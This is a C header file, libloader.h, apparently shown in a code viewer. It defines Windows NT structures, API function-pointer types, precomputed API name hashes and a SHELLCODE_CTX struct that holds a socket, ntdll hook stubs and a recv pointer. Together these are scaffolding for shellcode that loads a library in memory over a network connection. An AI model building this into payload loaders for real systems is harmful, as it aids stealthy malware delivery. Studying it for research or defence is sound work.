Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1

2
/*
3
 * libloader.h -- misc. defines for libloader
4
 * Jarkko Turkulainen <jt[at]klake.org>
5
 *
6
 */
7

8

9

10
#include <stdio.h>
11
#include <windows.h>
12

13

14
/* NTSTATUS values */
15

16
#define STATUS_SUCCESS 			0x00000000
17
#define STATUS_IMAGE_NOT_AT_BASE	0x40000003
18

19

20
/* Time values */
21
#define	HIGH_TIME	0x01C422FA
22
#define LOW_TIME_1	0x7E275CE0
23
#define LOW_TIME_2	0x8E275CE0
24

25

26

27
/* Some defines ripped off from DDK */
28

29
typedef struct _FILE_BASIC_INFORMATION {
30
	LARGE_INTEGER CreationTime;
31
	LARGE_INTEGER LastAccessTime;
32
	LARGE_INTEGER LastWriteTime;
33
	LARGE_INTEGER ChangeTime;
34
	ULONG FileAttributes;
35
} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;
36

37
typedef enum _SECTION_INFORMATION_CLASS {
38
	SectionBasicInformation,
39
	SectionImageInformation
40
} SECTION_INFORMATION_CLASS;
41

42
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
43

44
typedef LONG NTSTATUS;
45
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
46

47
typedef struct _IO_STATUS_BLOCK {
48
	NTSTATUS Status;
49
	ULONG Information;
50
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
51

52
typedef struct _UNICODE_STRING {
53
	USHORT Length;
54
	USHORT MaximumLength;
55
#ifdef MIDL_PASS
56
	[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
57
#else
58
	PWSTR  Buffer;
59
#endif
60
} UNICODE_STRING;
61
typedef UNICODE_STRING *PUNICODE_STRING;
62

63
typedef struct _ANSI_STRING {
64
	USHORT Length;
65
	USHORT MaximumLength;
66
	PWSTR Buffer;
67
} ANSI_STRING, *PANSI_STRING, STRING, *PSTRING;
68

69
typedef enum _SECTION_INHERIT {
70
	ViewShare = 1,
71
	ViewUnmap = 2
72
} SECTION_INHERIT;
73

74
typedef struct _OBJECT_ATTRIBUTES {
75
	ULONG Length;
76
	HANDLE RootDirectory;
77
	PUNICODE_STRING ObjectName;
78
	ULONG Attributes;
79
	PVOID SecurityDescriptor;
80
	PVOID SecurityQualityOfService;
81
} OBJECT_ATTRIBUTES;
82
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
83

84

85
/* Funtion definitions */
86

87
/* kernel32 */
88
typedef VOID (WINAPI *f_ExitProcess)(UINT);
89
typedef DWORD (WINAPI *f_LoadLibrary)(LPCTSTR);
90
typedef FARPROC (WINAPI *f_GetProcAddress)(HMODULE, LPCTSTR);
91
typedef LPVOID (WINAPI *f_VirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
92
typedef BOOL (WINAPI *f_VirtualFree)(LPVOID, SIZE_T, DWORD);
93
typedef DWORD (WINAPI *f_VirtualQuery)(LPCVOID, PMEMORY_BASIC_INFORMATION, SIZE_T);
94
typedef BOOL (WINAPI *f_VirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
95
typedef BOOL (WINAPI *f_FlushInstructionCache)(HANDLE, LPCVOID, SIZE_T);
96
typedef BOOL (WINAPI *f_WriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T *);
97

98
/* ntdll */
99
typedef NTSTATUS (NTAPI *f_NtOpenSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES);
100
typedef NTSTATUS (NTAPI *f_NtQueryAttributesFile)(POBJECT_ATTRIBUTES, PFILE_BASIC_INFORMATION);
101
typedef void (NTAPI *f_NtOpenFile)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, 
102
		PIO_STATUS_BLOCK, ULONG ShareAccess, ULONG);
103
typedef NTSTATUS (NTAPI *f_NtCreateSection)(PHANDLE, ULONG, POBJECT_ATTRIBUTES, PLARGE_INTEGER,
104
		ULONG, ULONG, HANDLE);
105
typedef NTSTATUS (NTAPI *f_NtMapViewOfSection)(HANDLE, HANDLE, PVOID *, ULONG, ULONG,
106
		PLARGE_INTEGER, PULONG, SECTION_INHERIT, ULONG, ULONG);
107

108

109
/* ws2_32 */
110
typedef int (WINAPI *f_recv)(SOCKET, char *, int, int);
111

112

113

114
/* Funtion hashes */
115

116
/* kernel32 */
117
#define	HASH_LoadLibraryA			0xec0e4e8e
118
#define	HASH_GetProcAddress			0x7c0dfcaa
119
#define	HASH_ExitProcess			0x73e2d87e
120
#define HASH_VirtualAlloc			0x91afca54
121
#define HASH_VirtualFree			0x030633ac
122
#define HASH_VirtualQuery			0xa3c8c8aa			
123
#define HASH_VirtualProtect			0x7946c61b
124
#define HASH_FlushInstructionCache		0x53120980	
125
#define HASH_WriteProcessMemory			0xd83d6aa1
126

127
/* ntdll */
128
#define HASH_NtOpenSection			0x92b5dd95
129
#define HASH_NtQueryAttributesFile		0x494a7890
130
#define HASH_NtOpenFile				0x852974b8
131
#define HASH_NtCreateSection			0x5bb29bcb
132
#define HASH_NtMapViewOfSection			0xd5159b94
133

134
/* ws2_32 */
135
#define HASH_recv				0xe71819b6
136
#define HASH_getpeername			0x95066ef2
137

138

139

140
typedef struct _SHELLCODE_CTX {
141

142
	/* File descriptor */
143
	SOCKET				sd;
144
	/* Library name */
145
	char				libname[256];
146
	int				liblen;
147
	/* Global offset */
148
	DWORD				offset;
149
	/* Allocated memory sections */
150
	DWORD				file_address;
151
	DWORD				mapped_address;
152

153
	/* Hook stub functions */
154
	unsigned char			s_NtOpenSection[10];
155
	unsigned char			s_NtQueryAttributesFile[10];
156
	unsigned char			s_NtOpenFile[10];
157
	unsigned char			s_NtCreateSection[10];
158
	unsigned char			s_NtMapViewOfSection[10];
159
	/* Hooked functions */
160
	DWORD				NtOpenSection;
161
	DWORD				NtQueryAttributesFile;
162
	DWORD				NtOpenFile;
163
	DWORD				NtCreateSection;
164
	DWORD				NtMapViewOfSection;
165

166
	/* function pointers, kernel32 */
167
	f_LoadLibrary			LoadLibrary;
168
	f_GetProcAddress		GetProcAddress;
169
	f_ExitProcess			ExitProcess;
170
	f_VirtualAlloc			VirtualAlloc;
171
	f_VirtualFree			VirtualFree;
172
	f_VirtualQuery			VirtualQuery;
173
	f_VirtualProtect		VirtualProtect;
174
	f_FlushInstructionCache		FlushInstructionCache;
175
	f_WriteProcessMemory		WriteProcessMemory;
176
	/* function pointers, ntdll */
177
	f_NtOpenSection			p_NtOpenSection;
178
	f_NtQueryAttributesFile		p_NtQueryAttributesFile;
179
	f_NtOpenFile			p_NtOpenFile;
180
	f_NtCreateSection		p_NtCreateSection;
181
	f_NtMapViewOfSection		p_NtMapViewOfSection;
182
	/* function pointers, ws2_32 */
183
	f_recv				recv;
184

185

186
} SHELLCODE_CTX;
187

188

189

190